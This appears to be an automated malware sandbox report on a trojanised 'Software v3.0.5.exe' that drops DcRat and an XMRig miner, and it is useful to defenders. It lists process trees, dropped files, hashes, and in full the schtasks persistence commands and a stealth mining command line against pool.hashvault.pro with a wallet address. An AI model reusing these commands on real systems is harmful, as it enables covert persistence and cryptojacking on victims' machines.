Analysis
-
max time kernel
135s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-07-2021 22:46
Static task
static1
Behavioral task
behavioral1
Sample
Software v3.0.5.exe
Resource
win7v20210410
General
-
Target
Software v3.0.5.exe
-
Size
910KB
-
MD5
56d73f0b8c89094a9f0ad6277f042b3d
-
SHA1
6efe8b8257f030fdb63a069aad558b6282310a31
-
SHA256
c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
-
SHA512
6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe dcrat C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe dcrat -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/964-223-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
Processes:
Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeservices64.exeservices32.exesihost64.exesihost32.exepid process 3064 Dcr.exe 3588 etc.exe 2844 xmr.exe 2208 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 3960 fonthostSvcIntodhcp.exe 2412 ShellExperienceHost.exe 2888 services64.exe 3960 services32.exe 1524 sihost64.exe 2836 sihost32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ipinfo.io 16 ipinfo.io -
Drops file in System32 directory 18 IoCs
Processes:
fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\System32\msdxm\dllhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\MapsCSP\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Windows\System32\wscproxystub\slui.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\msdxm\5940a34987c99120d96dace90a3f93f329dcad63 fonthostSvcIntodhcp.exe File created C:\Windows\System32\tpm\fontdrvhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\MapsCSP\fontdrvhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\dbgcore\fontdrvhost.exe fonthostSvcIntodhcp.exe File opened for modification C:\Windows\System32\dbgcore\fontdrvhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\puiapi\spoolsv.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\puiapi\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4 fonthostSvcIntodhcp.exe File created C:\Windows\System32\wscproxystub\a29f4157103644af5692ebfddf35f6dff4e237da fonthostSvcIntodhcp.exe File created C:\Windows\System32\blb_ps\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Windows\System32\tpm\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\mstsc\24dbde2999530ef5fd907494bc374d663924116c fonthostSvcIntodhcp.exe File created C:\Windows\System32\blb_ps\fontdrvhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\dbgcore\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe fonthostSvcIntodhcp.exe File opened for modification C:\Windows\System32\blb_ps\fontdrvhost.exe fonthostSvcIntodhcp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 2888 set thread context of 964 2888 services64.exe explorer.exe -
Drops file in Program Files directory 2 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe fonthostSvcIntodhcp.exe -
Drops file in Windows directory 9 IoCs
Processes:
fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\bfsvc\explorer.exe fonthostSvcIntodhcp.exe File created C:\Windows\bfsvc\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\dab4d89cac03ec27dbe47b361df763dc3f848f6c fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\f8c8f1285d826bc63910aaf97db97186ba642b4f fonthostSvcIntodhcp.exe File created C:\Windows\setupact\explorer.exe fonthostSvcIntodhcp.exe File created C:\Windows\setupact\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe fonthostSvcIntodhcp.exe File created C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\AppxMetadata\winlogon.exe fonthostSvcIntodhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 23 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3304 schtasks.exe 2412 schtasks.exe 4012 schtasks.exe 3204 schtasks.exe 4044 schtasks.exe 1540 schtasks.exe 3984 schtasks.exe 2428 schtasks.exe 3204 schtasks.exe 2288 schtasks.exe 740 schtasks.exe 2204 schtasks.exe 64 schtasks.exe 60 schtasks.exe 2084 schtasks.exe 8 schtasks.exe 2888 schtasks.exe 2660 schtasks.exe 1968 schtasks.exe 768 schtasks.exe 2740 schtasks.exe 1052 schtasks.exe 2740 schtasks.exe -
Modifies registry class 1 IoCs
Processes:
Dcr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Dcr.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeetc.exexmr.exeservices32.exeservices64.exepid process 2208 fonthostSvcIntodhcp.exe 2208 fonthostSvcIntodhcp.exe 2208 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 4044 fonthostSvcIntodhcp.exe 3960 fonthostSvcIntodhcp.exe 3960 fonthostSvcIntodhcp.exe 3960 fonthostSvcIntodhcp.exe 2412 ShellExperienceHost.exe 2412 ShellExperienceHost.exe 3588 etc.exe 2844 xmr.exe 3960 services32.exe 2888 services64.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ShellExperienceHost.exepid process 2412 ShellExperienceHost.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
fonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeShellExperienceHost.exeetc.exexmr.exeservices32.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2208 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 4044 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 3960 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 2412 ShellExperienceHost.exe Token: SeDebugPrivilege 3588 etc.exe Token: SeDebugPrivilege 2844 xmr.exe Token: SeDebugPrivilege 3960 services32.exe Token: SeDebugPrivilege 2888 services64.exe Token: SeLockMemoryPrivilege 964 explorer.exe Token: SeLockMemoryPrivilege 964 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exefonthostSvcIntodhcp.exeetc.exexmr.execmd.exedescription pid process target process PID 740 wrote to memory of 3064 740 Software v3.0.5.exe Dcr.exe PID 740 wrote to memory of 3064 740 Software v3.0.5.exe Dcr.exe PID 740 wrote to memory of 3064 740 Software v3.0.5.exe Dcr.exe PID 740 wrote to memory of 3588 740 Software v3.0.5.exe etc.exe PID 740 wrote to memory of 3588 740 Software v3.0.5.exe etc.exe PID 740 wrote to memory of 2844 740 Software v3.0.5.exe xmr.exe PID 740 wrote to memory of 2844 740 Software v3.0.5.exe xmr.exe PID 3064 wrote to memory of 3964 3064 Dcr.exe WScript.exe PID 3064 wrote to memory of 3964 3064 Dcr.exe WScript.exe PID 3064 wrote to memory of 3964 3064 Dcr.exe WScript.exe PID 3964 wrote to memory of 1524 3964 WScript.exe cmd.exe PID 3964 wrote to memory of 1524 3964 WScript.exe cmd.exe PID 3964 wrote to memory of 1524 3964 WScript.exe cmd.exe PID 1524 wrote to memory of 2208 1524 cmd.exe fonthostSvcIntodhcp.exe PID 1524 wrote to memory of 2208 1524 cmd.exe fonthostSvcIntodhcp.exe PID 2208 wrote to memory of 768 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 768 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 3984 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 3984 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 60 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 60 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 2740 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 2740 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 2084 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 2084 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 8 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 8 2208 fonthostSvcIntodhcp.exe schtasks.exe PID 2208 wrote to memory of 4044 2208 fonthostSvcIntodhcp.exe fonthostSvcIntodhcp.exe PID 2208 wrote to memory of 4044 2208 fonthostSvcIntodhcp.exe fonthostSvcIntodhcp.exe PID 4044 wrote to memory of 3304 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 3304 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2428 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2428 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2412 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2412 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2888 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2888 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 3204 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 3204 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2288 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 2288 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 1052 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 1052 4044 fonthostSvcIntodhcp.exe schtasks.exe PID 4044 wrote to memory of 3960 4044 fonthostSvcIntodhcp.exe fonthostSvcIntodhcp.exe PID 4044 wrote to memory of 3960 4044 fonthostSvcIntodhcp.exe fonthostSvcIntodhcp.exe PID 3960 wrote to memory of 4012 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 4012 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2660 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2660 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 740 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 740 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2740 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2740 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2204 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2204 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 1968 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 1968 3960 fonthostSvcIntodhcp.exe schtasks.exe PID 3960 wrote to memory of 2412 3960 fonthostSvcIntodhcp.exe ShellExperienceHost.exe PID 3960 wrote to memory of 2412 3960 fonthostSvcIntodhcp.exe ShellExperienceHost.exe PID 3588 wrote to memory of 2392 3588 etc.exe cmd.exe PID 3588 wrote to memory of 2392 3588 etc.exe cmd.exe PID 2844 wrote to memory of 2420 2844 xmr.exe cmd.exe PID 2844 wrote to memory of 2420 2844 xmr.exe cmd.exe PID 2420 wrote to memory of 3204 2420 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Dcr.exeC:\Users\Admin\AppData\Roaming\Dcr.exe2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\fonthostSvc\fonthostSvcIntodhcp.exe"C:\fonthostSvc\fonthostSvcIntodhcp.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\blb_ps\fontdrvhost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\Windows\System32\wscproxystub\slui.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\bfsvc\explorer.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\slui.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\fonthostSvc\fonthostSvcIntodhcp.exe"C:\fonthostSvc\fonthostSvcIntodhcp.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Boot\cs-CZ\services.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\setupact\explorer.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\msdxm\dllhost.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\tpm\fontdrvhost.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\MapsCSP\fontdrvhost.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe'" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\fonthostSvc\fonthostSvcIntodhcp.exe"C:\fonthostSvc\fonthostSvcIntodhcp.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\dbgcore\fontdrvhost.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fonthostSvcIntodhcp" /sc ONLOGON /tr "'C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D\fonthostSvcIntodhcp.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\puiapi\spoolsv.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\PerfLogs\RuntimeBroker.exe'" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etc.exeC:\Users\Admin\AppData\Roaming\etc.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services32.exe"C:\Users\Admin\AppData\Roaming\services32.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\xmr.exeC:\Users\Admin\AppData\Roaming\xmr.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fonthostSvcIntodhcp.exe.logMD5
c3768cc379bdfb7850f881c26e417929
SHA1b356b73dd3c102bbfa2e30280478a70ab7ebaf95
SHA2566249d345cf089d21710e680a923fca94324d1523c8dd8e6d4947e3fa064c353a
SHA512e115130acc07da8838de670e2bbe491e4a4a26ff968f67a46fd5ada86e453234f5a4a4a0c1574cb194dc0274fd266cf5507036208a0dc5358e7454d01b88fdd4
-
C:\Users\Admin\AppData\Roaming\Dcr.exeMD5
975a0ad02701f9f528784dee5a9728d2
SHA18a3b57da095dd6fc9d61fe004c1025d929370515
SHA256b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA5126d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
-
C:\Users\Admin\AppData\Roaming\Dcr.exeMD5
975a0ad02701f9f528784dee5a9728d2
SHA18a3b57da095dd6fc9d61fe004c1025d929370515
SHA256b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA5126d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
89c453dbd36f561195de8e5c5dce77a0
SHA18cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
89c453dbd36f561195de8e5c5dce77a0
SHA18cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
7059ba6625325156b764224d2b2dbd83
SHA14cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA25604c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
7059ba6625325156b764224d2b2dbd83
SHA14cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA25604c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
-
C:\Users\Admin\AppData\Roaming\etc.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\etc.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services32.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
